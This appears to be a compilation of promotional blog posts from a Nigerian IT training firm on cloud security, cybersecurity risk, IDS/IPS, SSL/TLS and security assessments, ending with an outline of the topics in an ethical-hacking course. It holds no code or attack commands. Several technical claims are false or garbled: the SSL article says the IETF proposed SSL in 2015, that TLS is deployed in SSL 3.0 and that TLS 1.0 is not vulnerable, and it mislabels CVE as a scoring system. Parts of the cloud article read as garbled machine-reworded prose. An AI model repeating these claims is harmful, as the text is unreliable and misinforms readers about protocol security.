The Four steps to Bolster cloud security-Cloud Computing-Soutech Nigeria

There has been a rapid growth in the use of cloud storage and the cloud technology is gradually moving from the ‘cloud-first’ strategy to the ‘cloud-only strategy. This is because the technology of cloud computing is in the year 2020 expected to have up to take up to about 70% of the enterprise software as well as the infrastructure.

The growth in the technology of public cloud has exposed organizations to trending security threats that normally cannot be minimized by employing endpoint security methodologies and technologies.

 

 

Security will be compromised because without applying the modern and cloud-native approach. The factors that affect the security include;

1.New Architectures

The architecture of cloud is entirely different from the legacy data centers which require some new approaches in the area of security. Traditional tools like penetration testing tools and network scanners are so reliable because the cloud is API-centric.

2. Increase of DevOps

When it comes to using public cloud, DevOps are on their own which end up not involving, not informing and not making central IT security teams aware. IT security teams require a new method to monitor the event of things because so many organizations are pushing are changing codes and productions everyday.

3. A More sophisticated landscape for threat

Hackers have kept the pace of in the deployment of similar tactics in order to automate attacks while DevOps teams have driven in the direction of making their code deployment process automated. This means that the surface of the attacks has been changed and there is not a path of traffic that can be monitored again. Security teams in order to ensure they have more visibility have resorted to deploying the use of new tools in all aspects of the organizations cloud applications.

The Four step program in bolstering cloud security

The issues surrounding the cloud security can be solved by the use of modern and cloud-native platforms which can make automation process very easy in order to provide a monitoring process that is continuous and further more analyse and remediate for cloud security compliance. This model has been able to offer a much better avenue for protection in the cloud far more than the traditional security platforms. Top cloud security experts have revealed that in order to achieve a continuous and automated cloud security and compliance, four key elements have to be addressed which are

  1. Real-time discovery in order to match the increasing pace of cloud changes: It is quite unusual for firms and organizations to possess millions of data points which require evaluation with the increasing cruelty surrounding the deployments in the cloud. A platform that can handle all the data in real time and isolating rapidly any form of security deviations and variations from good states is needed to the keep the functionality is cloud active
  2. Automated Action: One thing organizations must do is to automate monitor and remediate these processes to keep up. They need also to be flexible in the aspect of determining the way automated responses are made. They must also be able to inform the human administrators if there is a need for any other action.
  3. Deep insights to identify risks that may not be obvious: Communication can falter when the number of teams is large. You should make provision on your platform for teams to gain ownership of their security while also setting up security operations for other teams and corporate management in the bigger picture. This platform must be able to evaluate security information and details alongside the global customer base or across time and geography to put out a warning against potential issues before they occur.
  4. Comprehensive and properly detailed reports must be put together by teams about their daily security compliances and this should not necessarily be done during the yearly audit. You should be able to view the past and present state of your security and compliance stances by just a glance.

 

In conclusion, as organizations and firms make efforts to rely on public cloud in order to drive their daily business schemes and activities, they should also focus on the security risks and simplify the processes that are involved in the assurance of protection and compliance. Continuous security and compliance present us with new opportunities in order to maximize the value of the public cloud in the process of trying to minimize the risk.

It is very important to place our focus on the key characteristics such as automation, deep-insights and robust reporting and real-time discovery while evaluating potential cloud security platforms. The is a popular saying the IT world that the deployment of cloud technology changes everything but what doesn’t change is the importance of ensuring security and compliance.

 

To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

Cybersecurity breaches are inevitable; What to do to stay safe- Information Security tips-SOUTECH Nigeria

Cybersecurity threats have become a cause of concern for many organizations especially with the daily reports of cyber intrusions where large volumes of data theft and intellectual property are involved. With the rise of new exploitation techniques and methods such as insider threats ransomwares, and advanced persistent threats the need for investing in cybersecurity cannot be over emphasized.

It has also be proven to be difficult to find rapt solutions to cyberattacks because of the dynamism in cloud computing, operating environment, supporting mobile, the iOt (internet of things), remote users, the quest for support the network devices that users bring to their offices and of course the question of how, where and what strategies to deploy in terms of specific security.

James Comey, a former director in the FBI described two kinds of big companies in the United States. He categorized them into “into those who have been hacked by the Chinese and those who have not been hacked by the Chinese.” Also in January 2015 at the world Economic Forum which was about a year later, John Chambers a former CEO Cisco confirmed that the people that have been hacked, do not even know they have been hacked.”

From all of this information, does it mean that cybersecurity breaches are inevitable? If a cybersecurity breach is inevitable then is prevention really possible and is trying to secure data and data systems worth the money?

Despite the fact that these remarks are quite discouraging, organizations still go ahead with storing data, financial data, intellectual property and their personal data on networked systems. In the midst of all these risks, there are the good sides to data storage and security which outweigh the bad sides.

Cybersecurity involves managing risks

There are things that should be put in place to secure information even with the fact that cybersecurity breaches cannot be avoided. In environments where risk is managed, there are ways and processes that can be put in place to ensure that data breaches are avoided which I have described in my previous article as penetration testing, vulnerability assessments, and IT audits. The premise surrounding the management of risk, is that the risk scenario cannot be completely eliminated.

 

 

If these uncertainties can be erased, then the risk can totally be erased as well. There are two basic security measures that can be put in place if the risk of a cybersecurity breach does not amount zero. Now the first strategy is to cut down the probability of the occurrence of a cybersecurity breach and the second involves cutting down on the impact which the damage that occurs when a cybersecurity risk is discovered. In order to manage any type of cybersecurity risks, these two strategies and measures are very appropriate in managing them. Do not forget that the general way to approach cybersecurity is very transparent and easy to understand.

The first things to identify in the operation of business is the assets which means that information assets which include raw data, people, processes and technology have to be protected.

The second thing you must note is that the purpose of a risk assessment is to reveal risks scenarios which could lead to damage or loss of data through unauthorized and unexpected disclosures, modifications and loss of confidentiality of data assets. Risks components are very few. The typical scenario of a cybersecurity intrusion is when a threat leverages on a vulnerability to damage information asset security. In this example, the components of risk exist when there is vulnerability and an exploit takes advantage of that vulnerability, and also a threat actor uses that exploit to damage the information assets’ security. Therefore, the only things that can be controlled by the network security manager are the presence of vulnerabilities on the network. The next step that follows is making an attempt to identify the risk and eliminating it.

Typically, once a risk has been identified, it is known to be eliminated and when a vulnerability is eliminated, all the threat scenarios where the vulnerability is exploited is reduced to zero.

Cybersecurity Risk Prioritization

Risk management at its core is a decision-support tool and once all the necessary cybersecurity scenarios have been unraveled, the job of the decision-support tool is to prioritize the order and manner in which the identified risks can be mitigated or controlled.

If there are insufficient resources that are capable of handling all the identified vulnerabilities, then the activity of risk prioritization with an aim to remediate and mitigate it can be seen to be important. Prioritization is also very valuable even in the midst of sufficient resources in order to remediate the existing vulnerabilities.

Outcome vs Impact

The prioritization of vulnerabilities is based on its potential impact on the organization if the risk scenarios exploiting that vulnerability are all realized. It is important to try to understand what the impact is if the potential impact is the prioritization factor. Whenever a vulnerability is being exploited, there is an unwanted outcome which involves an unwanted disclosure of data, unauthorized modification or the loss of access to the information asset that is being affected by the vulnerability is being exploitation. The result if an unwanted outcome is referred to as impact.

In the HIPAA privacy or security rules, if the health records are stolen, the outcome is that information will be disclosed, but the impact to the organizations is that there could be there will be a mandatory breach in the costs of notification and the potential for fines and civil penalties could run into millions of naira and dollars.

The prioritization of vulnerability mitigation by its potential impact can be done in different ways and one of them is in the use of a prioritization tool called Common vulnerability scoring System (CVSS), which will provide a framework for which one can understand the characteristics and impacts of vulnerabilities in information technology.

When CVSS is used, there is a likelihood that when an organization discovers that its risk has been prioritized to low severity or medium severity, they will choose not to remediate it. But in the case of organizations with many systems including mission-critical systems, such organizations need to come to an understanding that the potential impact to that asset and organizations is not totally and solely dependent on the ratings of the CVSS, but it could be higher and the organization needs to remediate the vulnerability.

 

In conclusion, if it is true that cybersecurity breaches cannot be avoided then all is not lost. The only sad thing is it will not be possible to completely eliminate the uncertainty that there will be data breaches.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

 

The need for an Automated Approach to Cloud Security and Compliance- Challanges in Cloud Computing-Soutech NigeriaEducation

Regardless of whether you are in charge of general IT, IT security, DevOps or administrative compliance, odds are open cloud services are a consistently developing piece of your portfolio. This can be extraordinary for the business, empowering lower costs, more prominent dexterity and speedier speed to advertise. Be that as it may, it can exhibit new and serious difficulties in guaranteeing security and compliance.

The public cloud is a radical new world. In the event that you think customary techniques for securing the data center or firewalling the border will keep your information and applications secured, you might be in for a reality check. The main issue with taking an approach in the form of a legacy approach is that they were not intended for the cloud period, which implies they don’t support or make use of the API-driven infrastructure of the public cloud.

 

 

 

Whatever your part is in your organization, you can infer huge advantages by grasping a present day, cloud-local model that utilizes equipment that are built on purpose to consistently and consequently screen and oversee security and compliance along the API control plane.

If you are in charge of IT, security or compliance, you can diminish costs, enhance security and affirm more prominent control over cloud technology and shadow IT. In the event that you are in DevOps, you can move rapidly without sitting tight for endorsements from security—while disposing of the potential for the calamity that is continually approaching if appropriate security and consistence balanced governance are not being set up.

Given the proper cloud security platform, the general organization can make of use automation to decrease risk and expel the human components from imperative procedures. Automation enables you to accomplish and achieve a constant visibility scheme over your cloud deployments, empowering reliable duplication among use conditions, for example, improvement, organizing and creation.

Automation, Security, Compliance and the cloud

The adoption of cloud technology moves too rapidly and is liable to excessively quick changes for organizations and firms to depend on manual assets. The major test, be that as it may, is that most organizations still utilize legacy devices, innovations and methodologies to oversee cloud security and compliance.

Luckily, new cloud-local arrangements are presently accessible, conveying an agent-less platform intended particularly for recent modern clouds.

 

These arrangements use the cloud’s API engineering architecture to determine gigantic adaptability in scaling and overseeing cloud security and compliance.

 

 

 

 

The steps below therefore will depict how an advanced automated approach to deal with persistent cloud security and compliance works. It depends on the Evident Security Platform from driving cloud security firm Evident.

Step 1

Close Observation: The environment revolving around cloud computing is evolving persistently. These progressions can be ordinary, routine exercises of your DevOps or IT groups; they can likewise be crafted by individuals who might do mischief to your business. As changes are made—over all cloud platforms, services and regions—the cloud security platform screens the designs of the cloud infrastructure to guarantee that it holds fast to security and compliance best practices.

Step 2

Assessment: The security platform safely gathers information about the services in your cloud and constantly performs checks against a progression of foreordained best security standards. It additionally performs checks against any predefined custom marks. These checks decide, on a persistent premise, if there are any conceivably exploitable vulnerabilities.

Step 3

In-depth Analysis: The platform at that point plays out an investigation to decide if the misconfigurations and exposures are prioritized and quantified into high, medium or low risk levels.

Step 4

Automated Remediation: The result of the subsequent analysis being performed is shown on a dashboard and can be sent to incorporated frameworks for auto-remediation work processes to set in.

Step 5

Robust Reporting: Comprehensive and detailed reports are made accessible so your groups can see data involving the risk, as well as client attribution and infected assets.

Step 6

Correction: The groups would then be able to utilize simple-to-follow remediation methodologies to recover the infrastructure to a safe state.

Conclusion

Public cloud is not going to be phased out any time soon but before the decade’s over, people in general cloud administrations/services market will surpass $230 billion, as predicted by Forrester Research. As cloud turns out to be more key to the accomplishment of your organization, it is key that you concentrate on security and compliance, regardless of whether your part is in IT, security, DevOps or corporate administration and compliance.
By grasping a constant security model, your organization will have the capacity to process many procedures that would overpower your groups and frameworks on the premise that they must be done manually. It not just accommodates upgraded security and compliance assurances, it likewise calms the weight on your staff, enhances security for DevOPs and different groups, and brings down the cost and danger of cloud security and compliance.

Cloud computing and its associated technologies is a very broad field. But I have in a few of my writeups been able to discuss the few trends and challenges that is being faced in the cloud environment. To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at Soutech Ventures to learn CEH course in details.

Six important benefits of IDS/IPS in your business-Secure your network-Tips from SOUTECH Nigeria

Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) have been very effective over the years in countering against cyberattacks and also in the securing the network perimeter on the segments of the internal network. They serve as extra eyes in the aspect of securing data from losses and authorized access and any form of damages which can lead to collateral damages to the organization in both monetary terms and its reputation.

 

 

Now, the usage and effectiveness of this devices and technology can only survive when there is sufficient manpower and training. Organizations and network administrators must come to the knowledge that the use of IDSs and IPSs require training in other to interpret and act on its results.

There are benefits in the deployment of the technology of IDS/IPSes in businesses which include

  • Identifying the number and the type of security incidents.
  • Making sure security events do not escalate to security incidents.
  • Improving on the ability if network devices being discovered
  • Protection of vulnerable assets.
  • Protection of Operating systems and application softwares

The use of all the information obtained here to meet various regulatory requirements.

Now let us go ahead and explore the benefits of IDS/IPS in information security.

1.Identifying security incidents

The technologies of IDS/IPS do not only help to capture logs of IP addresses and ports of the communication going between different systems but can also be used to identify some specific content inside a network packet. Example, they can use botnet controllers can capture reports that have been identified from any compromised endpoint devices and can also identify DDOS attacks.

The sensor in modern IDS/IPS can help to quantify the types and the numbers of such attacks that an organization is vulnerable to and can go further to help it alter any existing security controls and deploy some new ones. It can also identify bugs in softwares and address host and network device configuration issues. The results determined can be used to perform further risk assessments.

2. Prevention of Security incident

The deployment of IDS/IPS technology can help to prevent the occurrence of security incidents which it does by disrupting communication between an attacker and his target, it can also report security incidents as well. Sensors in modern IDS/IPS can take packets in the network and examine them based on the context of the protocols supporting it. Example, if there is an HTTP protocol attack such as cross site scripting and SQL injection attack, it can be detected and blocked. The sensors in IDS/IPS can identify and block anomalous behavior which can be in form of an out-bound traffic.

3.Protection of vulnerable assets

IDS/IPS have been upgraded to be virtual patches for some software vulnerabilities. This enables network administrators to block any form of attacks until patches have been developed for such software vulnerabilities and until the cost for replacing systems until the patches are ready. The ability to identify the level of patches can be very useful for gauging the deployment of patches and for automation of vulnerability assessments.

 

4. Identification of network devices and hosts

Sensors in IDS/IPS can be used in a passive means to detect the presence of network devices and hosts as well. They can do this based on;

  • The data within the network packets in real time
  • Identify operating systems and services which are offered by the network device of the host.

This can help to eliminate a great deal of the manual work that can be applicable in determining the number of systems that are available alongside their configurations. Apart from helping the automation of hardware inventories, IDS/IPS can be applicable in the identification of rogue devices in the network like unauthorized hosts and rogue wireless access points and rogue hotspots.

5. Leveraging of information gained to meet regulatory requirements

IDS/IPS have the ability to give an organization deep insight into their networks and their connected resources. Regulatory mandates can also be met for example in the PCI-DSS 1.1.6 documentation, there is permission for the documentation and business justification of use of all the services and protocols and it can be researched using reports obtained from IDS/IPS logs.

6. Improvement in the Return on Investment (ROI)

There has been an identification of some improved efficiencies and the attendance of labour costs. An organization can determine how much of a return on investment (ROI) IDS/IPS it can supply if the infrastructure is able to reduce or completely mitigate two major things which include;

  • Degradation and denial of internet service and/or internal network service such as application service downtimes and business ramifications of the network.
  • A security breach which involves the loss of sensitive customer information and credentials as well as intellectual property.

My word for network administrators is to explore more on the use of the IDS/IPS to boost business and ensure that asides their basic functions, they are able to harness other functionalities in these devices.

To learn more about vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.

The Secure Socket Layer and how it secures your internet sessions- Be Educated-SOUTECH Nigeria

I’ll be teaching here on the Secure Sockets Layer because most of I believe have been hearing of SSL as a protocol but do not know how it works; don’t worry I’ve got you. What is SSL?

Secure Sockets Layer is a protocol applicable in computer networks that secures connections that exist between network application clients and servers on insecure networks such as the internet. SSL was proposed for use on the internet by the Internet Engineering Task Force (IETF) in 2015 because of the very many protocol and implementation flaws and vulnerabilities found in the other internet protocols. It has however been replaced by the TLS (Transport Layer Security) protocol. TLS and SSL are however not compatible together so therefore TLS is deployed in the SSL 3.0.

SSL was originally developed as a protocol in its proprietary state in the 1990s such that it allows the Netscape browser clients which work over the HTTP (hypertext Transfer Protocol) to communicate securely with Netscape web servers. SSL was eventually adopted for use to secure authentication and encryption in network transport layer communications.

Encryption Standard used in SSL

 

SSL makes use of two keys which are the public key and the symmetric key to ensure encryption when two machines when they establish a connection. These machines can typically be web or mail server and a client system communicating over the internet or some other TCP/IP network. SSL makes sure that data that is being sent between two processes working in the client and server model is encrypted and authenticated.

SSL works above the transport and network layer and is responsible for the transportation of data packets between processes and data routing of network traffic over a network between a client and server. It also works below the application layer protocols like the popular HTTP and SMTP (Simple Mail Transport Protocol).

Ever wondered what the word ‘socket’ in the term SSL refers to? It refers to the sockets method which data is transported between a client and server program in a certain network or between processes that take place on the same computer device.

Like I said, TLS protocol was developed from the SSL and has phased out the SSL protocol but in the aspect of SSL or SSL/TLS, they are still commonly used to refer to the protocol that was used to protect the internet traffic. SSL/TLS is the most widely deployed security protocol being used today and has been known secure up to about 50% of the pages that have been loaded on the Google chrome browser. SSL has been specifically implemented for applications such as email, file transfer, VoIPs, instant messaging which is an additional method to support the transmission of web pages.

How does SSL work?

The SSL protocol has majorly two sub-protocols which are;

  • The Record Protocol: This protocol defines how the hosts communicating will use exchange data via the SSL which include specifications for how data is to be prepared before being transmitted. It also tells how the verification and decryption of the received data.
  • The Handshake Protocol: This protocol defines how the client and server go about to establish an SSL connection. This includes the negotiation in way the cryptographic systems and each host is willing or unwilling to be engaged in the exchange of cryptographic materials. This includes the session keys and public keys for the encryption or authentication or transmitted data.

Now, during the handshake process, the initial process that takes place is that the server presents its digital certificate in order to be authenticated with the client. The server certificates use the X.509 certificate standard format which is defined by the public key cryptography standards. In order to be authenticated, the public key encryption validates the digital certificate and is used to confirm that the server is what it says it is.

Immediately the server is authenticated, the client and the server will go ahead to establish the settings of the cipher and a shared key will be used to encrypt the information that is being exchanged until the session expires. By this way, data confidentiality and integrity are assured and the whole process is invisible to the user.

Now let us look at this example, if a webpage is in need of an SSL connection, the URL will be changed from HTTP to HTTPS and you will see a padlock icon on the left pane of the browser once the server gets authenticated.

 

The handshake process allows the authentication to happen between the client and server. When the server authentication is complete, the client has to present its certificate to the server in order to authenticate its identity before it is encrypted for the SSL session to be established.

Version 3.1 of the SSL was released as TLS 1.0 (which was named to avoid legal issues with Netscape) after IETF officially took over the SSL protocol in order to standardize it through the open process. Attacks perpetrated against the SSL have been majorly been focused on issues in the SSL implementation. POODLE (Padding Oracle On Downgraded Legacy encryption) vulnerability is a known flaw in the SSL 3.0 protocol which is as a result of the way it ignores padded bytes when running in the cipher block chain mode. This existence of this flaw gives room for an attacker to decrypt sensitive data like the authentication cookies. TLS 1.0 has not been known to be vulnerable to attacks because it shows that all the padding bytes need to have the same value and must be authenticated.

There are some other differences between the TLS and SSL which make it a more secure and efficient protocol which is in its message authentication, generation of the key material, and the supported cipher suites where TLS supports some new and recent secure algorithms. The most recent version is the TLS 1.2 and the publication of the next version is expected before the year of this year 2017 pending approval. This update may likely be called the TLS 1.3 or the TLS 2.0.

subscribe to our CEH course at SOUTECH ventures to know more about network security and this subject topic in full. Call us today: 08034121380

Check out SOUTECH bespoke training sessions of over 20 Professional IT courses.

Professional IT Courses Training in Abuja: Web Design, Ethical Hacking, Networking, Mobile App Development, Project Management

Order any of our IT Training Kits

https://buyallsoftwares.com/

BEST PRACTICES FOR PERFORMING AN INFORMATION SECURITY ASSESSMENT-SOUTECHNIGERIA TIPS

Dear reader, do you know of the best way to measure information security risk? My favorite answer is that you dive in immediately to find those vulnerabilities that are specifically inherent in your system and applications. This can be likened to humans going through different tests to know the situation of their health through blood tests and analysis as well as magnetic resonance imaging and the likes. Some IT experts may refer to this kind of exercise as IT security audits while some may refer to it as penetration testing. Well, I will say that when you are performing an in-depth analysis of any IT infrastructure, it is not just about comparing policies to the working mechanism of things and trying to proof a point. This is the reason why I prefer to call this exercise information security assessment. Information security assessment is a broader and a more meaningful standard to unravel areas where security policies and procedures are lagging.

The ultimate goal in security testing is to find and fix any form of weaknesses in a system before anyone gets to exploit them and this is the core reason why the semantics of security testing is debated. It is therefore the duty of all security professionals to ensure that proper steps and measures are taken to ensure risk identification is understood. Let us put ego and politics aside and ensure that the key components of an effective information security scheme is given the desired attention. What are the key components of a detailed information security assessment?

1.Support: One of the important components is support of management. This is because no good information security assessment scheme can be successful without first receiving the support of management. If the leadership of an organisation is not willing to invest immensely their resources into making sure that their IT infrastructure is protected to a great extent, then the battle will be much more uphill. The focus should be on getting and keeping the right team on the organizational board. The target should not be on just management but on the security staff and member of the team.

2. Scope: This is known to be a very vital phase of information security assessment and I have seen many examples where the applications, systems and even the entire IT network is being excluded from security testing. The reasons are usually the same which may be insufficient time and lack of money. In as much as you need to fine tune the scope of your work, you have to make sure that all the critical systems are looked at and as soon as possible. In subsequent times, you may need to totally look at your environment because it requires a benign system, network segments or security process to out everything in jeopardy. The systems to be considered are the external and internal systems as well as the systems that are being hosted in the cloud by third parties as well as the marketing website. Also, it is of absolute necessity to do an authentic security testing of both the web applications and the operating systems. Ensure all that there is a fair test conducted on the people, the processes and all the physical system.

3. Testing: The testing phase should include and begin with vulnerability scan by using a vulnerability scanner to perform a manual analysis to discover the areas that are susceptible to attacks as regards to our context of the business environment. This phase usually includes activities like;

  • Password cracking
  • Wireless network analysis
  • Email phishing

The most important in this phase is to do an overview of the business environment from an attackers’ viewpoint in order to see the areas that can be exploited and then demonstrate what may happen so that the issue can be analyzed and steps taken towards resolving it.

4. Reporting: Doing a 500-page PDF report from a vulnerability scanner will not make it either easy to understand the issue or prevent it from happening. The aim of a report is to obtain a security assessment report that is concise prioritizes findings and recommendations on the way out. The report does not have to be lengthy but needs to be drafted in a way that will cut to the chase and give an detailed outline of the specific areas of weaknesses that should be given immediate and proper attention. This is often done from the viewpoint and professionalism of the security professional taking into account the business and systems. IT security auditing and penetration testing are the elements that are incorporated here as well. There are many standards to draft out good reports but I’m usually not a big fan of follow too many standards but I advocate that you draft out something that works for you. You can look out for templates such as the CVE (Common Vulnerability Scoring System) and some similar ratings which provide a severe rating for SNMP (Simple Network Management Protocol) which is being enabled with a two-default community string. If the vulnerabilities are discovered to be on very high risk, then what will be the dangers of a weak firewall password. Missing patches that are remotely exploitable, SQL injections on intrinsic web applications? What should rather be applicable here is common sense and the worst kind of information security assessment that can be performed and that will not have a formal report with issues that cannot be resolved.

5. Resolution: After a detailed report has been made, we must take all the discovered problems are try to develop solution plans for them. Majorly, problems should be found and fixed. I have seen security reports that contain unacknowledged and pending solutions after a security assessment. There is an easy fix which involves assigning responsibilities and ensuring that everyone is held accountable. The usual cycle for performing your information security assessments spans from 6months to a year depending on the environment. An alternative way is to do a follow-up from a time frame of 30 to 45 days after a report is drafted when performing a remediation validation of all the critical and highly prioritized findings.

6. Oversight: This involves ensuring that the security process between the security assessments will require things like tweaking of the existing systems and software including an implementation of the new technical controls with an outright of the policies and processes. Instead of trying to achieve a perfect security, your target should be on moving forward should on achieving a good security with a shorter time for catching flaws and resolving them. The management must be engaged with the task of achieving this plan with the executives kept on board with whats required in the aspect of compliance and contractual obligations. Whether or not they are interested, the right people must be kept to make sure security is ensured. By doing this Return on Investment is assured which is essential for business growth. Note that security is not out of mind but a priority.

As final words, I will say that the bottom line of the matter is that every business organisation has information and computing infrastructure that criminal hackers or malicious attackers are interested in for their gains. Of course, you know that you cannot totally be safe or immune from information risks and attacks so you must know the value of information security assessments. Organisations and businesses I would advise not to depend on IT security auditing and penetration testing to be safe. Neglecting IT security assessments is not a defensive option for due care. Furthermore, take out time to properly plan and strategize on how to perform information security assessment, ensuring that the task is completed and that the proper staff members in IT, development management and elsewhere are appraised on the findings so the matter can be resolved.

Some security professionals and vendors will try to paint it that information security assessment is not a difficult exercise to perform and will not be a very expensive project given its virtual return on investment. But I must tell you that your information security program will be a deep reflection of what you invest in. That means if you fail at it, then you stand a huge chance of shutting down your infrastructure. So, I will tell you a quote from warren Buffet which says “you only have to do a very few things in your life so long as you don’t do too many things wrong.” Assessments are never and will not be the perfect solution to your security problems even though it is performed periodically or consistently. The fact that you have tall fences, a big and strong gate and armed men at your does not guarantee 100% your safety. However, there is a big level of assurance that if you choose to ignore this exercise, history will of a surety repeat itself.

You can subscribe to our services at Soutech ventures to give you the desired security ideas that you may require to carry out a detailed and successful information security assessment. You can also learn our Ethical Hacking course from EC-Council which is desired to educate and give you hands-on knowledge on how to secure your infrastructure.

Certified Ethical Hacker Training- Cyber Security Courses in Nigeria- SOUTECH Web Consuts

What makes the Ethical Hacking and Countermeasures course different from other courses in the market?

The Ethical Hacking and Countermeasures course prepares candidates for the CEH exam offered by EC-Council. The course focuses on hacking techniques and technology from an offensive perspective. The advanced security course is regularly updated to reflect latest developments in the domain, including new hacking techniques, exploits, automated programs as well as defensive recommendations as outlined by experts in the field. The CEH body of knowledge represents detailed contributions from security experts, academicians, industry practitioners and the security community at large.

What is the Employment Value of CEH?

The ANSI accredited Ethical Hacking program is primarily targeted at security professionals who want to acquire a well rounded body of knowledge to have better opportunities in this field. Acquiring a CEH means the candidate has a minimum baseline knowledge of security threats, risks and countermeasures. Organizations can rest assured that they have a candidate who is more than a systems administrator, a security auditor, a hacking tool analyst or a vulnerability tester. The candidate is assured of having both business and technical knowledge.

Features

Updated Content

  • CEH v8 contains completely updated content on rapidly evolving security scenario and attack mechanisms

New Hacks

  • CEH v8 provides insights on new hacking techniques, networked environment and organized cybercrime

Hacking Tools

  • CEH v8 showcases thousands of Hacking tools including password cracker, spyware, live Trojans and viruses.

Security Tools

  • CEH v8 provides a detailed description of different industry-standard securitytools. Other tools are listed for testing by students in a lab environment.

Legal Agreement

  • Ethical Hacking and Countermeasures course mission is to educate, introduce anddemonstrate hacking tools for penetration testing purposes only. Prior to attending thiscourse, you will be asked to sign an agreement stating that you will not use the newly acquired skills for illegal or malicious attacks and you will not use such tools in an attempt to compromise any computer system, and to indemnify EC-Council with respect to the use or misuse of these tools, regardless of intent. Not anyone can be a student — the Accredited Training Centers (ATC) will make sure the applicants work for legitimate companies.
 Introduction to Ethical Hacking
  • Internet is Integral Part of Business and Personal Life – What Happens Online in 60 Seconds
  • Information Security Overview
    • Case Study
      • eBay Data Breach
      • Google Play Hack
      • The Home Depot Data Breach
    • Year of the Mega Breach
    • Data Breach Statistics
    • Malware Trends in 2014
    • Essential Terminology
    • Elements of Information Security
    • The Security, Functionality, and Usability Triangle
  • Information Security Threats and Attack Vectors
    • Motives, Goals, and Objectives of Information Security Attacks
    • Top Information Security Attack Vectors
    • Information Security Threat Categories
    • Types of Attacks on a System
      • Operating System Attacks
        • Examples of OS Vulnerabilities
      • Misconfiguration Attacks
      • Application-Level Attacks
        • Examples of Application-Level Attacks
      • Shrink Wrap Code Attacks
    • Information Warfare
  • Hacking Concepts, Types, and Phases
  • Hacking Concepts, Types, and Phases
    • What is Hacking
    • Who is a Hacker?
    • Hacker Classes
    • Hacking Phases
      • Reconnaissance
      • Scanning
      • Gaining Access
      • Maintaining Access
      • Clearing Tracks
    • Ethical Hacking Concepts and Scope
      • What is Ethical Hacking?
      • Why Ethical Hacking is Necessary
      • Scope and Limitations of Ethical Hacking
      • Skills of an Ethical Hacker
    • Information Security Controls
      • Information Assurance (IA)
      • Information Security Management Program
      • Threat Modeling
      • Enterprise Information Security Architecture (EISA)
      • Network Security Zoning
      • Defense in Depth
      • Information Security Policies
        • Types of Security Policies
        • Examples of Security Policies
        • Privacy Policies at Workplace
        • Steps to Create and Implement Security Policies
        • HR/Legal Implications of Security Policy Enforcement
      • Physical Security
        • Physical Security Controls
      • Incident Management
        • Incident Management Process
        • Responsibilities of an Incident Response Team
      • What is Vulnerability Assessment?
        • Types of  Vulnerability Assessment
        • Network Vulnerability Assessment Methodology
        • Vulnerability Research
        • Vulnerability Research Websites
      • Penetration Testing
        • Why Penetration Testing
        • Comparing Security Audit, Vulnerability Assessment, and Penetration Testing
        • Blue Teaming/Red Teaming
        • Types of Penetration Testing
        • Phases of Penetration Testing
        • Security Testing Methodology
        • Penetration Testing Methodology
      • Information Security Laws and Standards
        • Payment Card Industry Data Security Standard (PCI-DSS)
        • ISO/IEC 27001:2013
        • Health Insurance Portability and Accountability Act (HIPAA)
        • Sarbanes Oxley Act (SOX)
        • The Digital Millennium Copyright Act (DMCA) and Federal Information Security Management Act (FISMA)
        • Cyber Law in Different Countries

 

Footprinting and Reconnaissance

  • Footprinting Concepts
    • What is Footprinting?
    • Objectives of Footprinting
  • Footprinting Methodology
    • Footprinting through Search Engines
      • Finding Company’s Public and Restricted Websites
      • Determining the Operating System
      • Collect Location Information
      • People Search: Social Networking Services
      • People Search Online Services
      • Gather Information from Financial Services
      • Footprinting through Job Sites
      • Monitoring Target Using Alerts
      • Information Gathering Using Groups, Forums, and Blogs
    • Footprinting using Advanced Google Hacking Techniques
      • Google Advance Search Operators
      • Finding Resources Using Google Advance Operator
      • Google Hacking Database (GHDB)
      • Information Gathering Using Google Advanced Search
    • Footprinting through Social Networking Sites
      • Collect Information through Social Engineering on Social Networking Sites
      • Information Available on Social Networking Sites
    • Website Footprinting
      • Website Footprinting using Web Spiders
      • Mirroring Entire Website
        • Website Mirroring Tools
      • Extract Website Information from http://www.archive.org
      • Monitoring Web Updates Using Website Watcher
        • Web Updates Monitoring Tools
      • Email Footprinting
        • Tracking Email Communications
          • Collecting Information from Email Header
          • Email Tracking Tools
        • Competitive Intelligence
          • Competitive Intelligence Gathering
          • Competitive Intelligence – When Did this Company Begin?  How Did it Develop?
          • Competitive Intelligence – What Are the Company’s Plans?
          • Competitive Intelligence – What Expert Opinions Say About the Company
          • Monitoring Website Traffic of Target Company
          • Tracking Online Reputation of the Target
            • Tools for Tracking Online Reputation of the Target
          • WHOIS Footprinting
            • WHOIS Lookup
            • WHOIS Lookup Result Analysis
            • WHOIS Lookup Tools
            • WHOIS Lookup Tools for Mobile
          • DNS Footprinting
            • Extracting DNS Information
            • DNS Interrogation Tools
          • Network Footprinting
            • Locate the Network Range
            • Traceroute
            • Traceroute Analysis
            • Traceroute Tools
          • Footprinting through Social Engineering
            • Footprinting through Social Engineering
            • Collect Information Using Eavesdropping, Shoulder Surfing, and Dumpster Diving
          • Footprinting Tools
            • Footprinting Tool
              • Maltego
              • Recon-ng
            • Additional Footprinting Tools
          • Footprinting Countermeasures
          • Footprinting Penetration Testing
            • Footprinting Pen Testing
            • Footprinting Pen Testing Report Templates

 

Scanning Networks

  • Overview of Network Scanning
    • TCP Communication Flags
    • TCP/IP Communication
    • Creating Custom Packet Using TCP Flags
  • CEH Scanning Methodology
    • Check for Live Systems
      • Checking for Live Systems – ICMP Scanning
      • Ping Sweep
        • Ping Sweep Tools
      • Check for Open Ports
        • SSDP Scanning
        • Scanning IPv6 Network
        • Scanning Tool
          • Nmap
          • Hping2 / Hping3
          • Hping Commands
        • Scanning Techniques
          • TCP Connect / Full Open Scan
          • Stealth Scan (Half-open Scan)
          • Inverse TCP Flag Scanning
          • Xmas Scan
          • ACK Flag Probe Scanning
          • IDLE/IPID Header Scan
            • IDLE Scan: Step 1
            • IDLE Scan: Step 2 and 3
          • UDP Scanning
          • ICMP Echo Scanning/List Scan
        • Scanning Tool: NetScan Tools Pro
        • Scanning Tools
        • Scanning Tools for Mobile
        • Port Scanning Countermeasures
      • Scanning Beyond IDS
        • IDS Evasion Techniques
        • SYN/FIN Scanning Using IP Fragments
      • Banner Grabbing
        • Banner Grabbing Tools
